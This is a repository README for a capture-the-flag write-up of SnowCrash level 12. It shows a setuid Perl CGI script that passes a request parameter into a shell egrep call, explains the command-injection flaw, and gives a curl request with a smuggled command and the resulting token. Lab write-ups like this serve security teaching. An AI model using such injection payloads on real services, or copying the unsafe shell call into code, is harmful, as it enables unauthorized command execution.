maix/snowcrash
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
snowcrash/levels/12
History
Exact
Maieul BOYER 25ddaf020d
level 12
2026-01-19 19:56:37 +01:00
..
flag level 12 2026-01-19 19:56:37 +01:00
passwd level 12 2026-01-19 19:56:37 +01:00
README.md level 12 2026-01-19 19:56:37 +01:00

README.md

Level 12

how to login

username: level12

password: fa6v5ateaw21peobuub8ipe6s

Goal

run getflag as user flag12

Actually doing something

level12@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level12 level12  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level12 level12  220 Apr  3  2012 .bash_logout*
-r-x------  1 level12 level12 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x+ 1 flag12  level12  464 Mar  5  2016 level12.pl*
-r-x------  1 level12 level12  675 Apr  3  2012 .profile*

Perl again...

level12@SnowCrash:~$ cat level12.pl 
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/; 
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }    
}

n(t(param("x"), param("y")));

a bit more involed, lets try to make it more pretty

#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $arg2 = $_[1];
  $arg1 = $_[0];
  $arg1 =~ tr/a-z/A-Z/; 
  $arg1 =~ s/\s.*//;
  @output = `egrep "^$arg1" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $arg2) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));

when looking at this, we basically spot an egrep meaning that we have a shell injection.

lets look at what is given to this string

first of all, we get called with two argument, lets call them by their http parameter names x and y

in the script they are also named arg1 for x and arg2 for y

arg2 doesn't matter for us, so lets ignore it

arg1 is converted to uppercase, and then we only keep erverything up to the first space;

so we want to execute something like last time, meaning that we want to instert something to stop the current comment ";cmdhere

but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is /tmp which is in lowercase...

Alas this doesnt matter since we are in shell land, and we can say /*/GETOK to refer to the /tmp/GETOK script

level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr